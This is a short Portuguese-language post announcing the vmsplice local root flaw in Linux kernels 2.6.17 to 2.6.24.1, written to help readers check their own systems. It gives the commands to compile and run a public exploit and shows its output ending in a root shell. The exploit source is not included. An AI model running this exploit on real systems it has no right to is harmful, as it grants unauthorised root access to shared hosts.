Exploit para vmsplice no kernel 2.6 do linux permite acesso de root para usuário local

Foi descoberta uma falha que afeta praticamente todas as distribuições que possuem versão do kernel de 2.6.17 a 2.6.24.1

Esta falha permite que usuários locais tenham acesso de root. Este bug afeta em geral os serviços de hosting onde os usuários tem acesso por SSH. Caso você utilize um computador em casa que só você tem acesso, o bug pode existir, mas não vai te afetar, pois usuários remotos não conseguem acesso de root sem ter uma conta de usuário normal na máquina.

Para testar se o seu sistema está vulnerável, copie o conteúdo do exploit para a máquina de teste e rode os comandos abaixo:

[code]

$ gcc exploit.c -o exploit $ whoami (irá mostrar seu nome de usuário) $ ./exploit ———————————– Linux vmsplice Local Root Exploit By qaaz ———————————– [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7d90000 .. 0xb7dc2000 [+] root $ whoami root (você estará logado como root) [/code]

Mais informações: busque no google